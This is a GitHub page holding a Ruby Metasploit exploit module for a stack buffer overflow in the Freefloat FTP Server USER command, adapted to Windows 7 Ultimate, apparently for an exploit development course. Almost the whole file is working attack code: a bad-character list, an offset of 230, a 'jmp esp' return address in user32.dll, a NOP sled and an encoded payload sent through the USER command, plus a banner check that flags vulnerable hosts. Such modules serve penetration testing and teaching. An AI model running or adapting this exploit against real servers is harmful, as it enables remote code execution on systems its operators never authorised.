-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathfreefloatftp_userwin7ultimate.rb
More file actions
75 lines (69 loc) · 2 KB
/
freefloatftp_userwin7ultimate.rb
File metadata and controls
75 lines (69 loc) · 2 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'Free Float FTP Server USER Command Buffer Overflow',
'Description' => %q{
Freefloat FTP Server is prone to an overflow condition. It
fails to properly sanitize user-supplied input resulting in a
stack-based buffer overflow. With a specially crafted 'USER'
command, a remote attacker can potentially have an unspecified
impact.
},
'Platform' => 'win',
'Author' =>
[
'D35m0nd142', # Original exploit
'Doug Prostko <dougtko[at]gmail.com>', # MSF module
'unyu hacker' #win7 Ultimate (For exploit devel POC course)
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '69621'],
[ 'EDB', '23243']
],
'Privileged' => false,
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d",
},
'Targets' =>
[
[ 'FreeFloat / Windows 7 Ultimate',
{
'Ret' => 0x76BC4E5B , # jmp esp; ret - user32.dll
'Offset' => 230
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 12 2012'))
end
def check
connect
disconnect
if (banner =~ /FreeFloat/)
# Software is never updated, so if you run this you're f*cked.
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def exploit
connect
buf = rand_text(target['Offset'])
buf << [ target['Ret'] ].pack('V')
buf << make_nops(50)
buf << payload.encoded
send_user(buf)
disconnect
end
end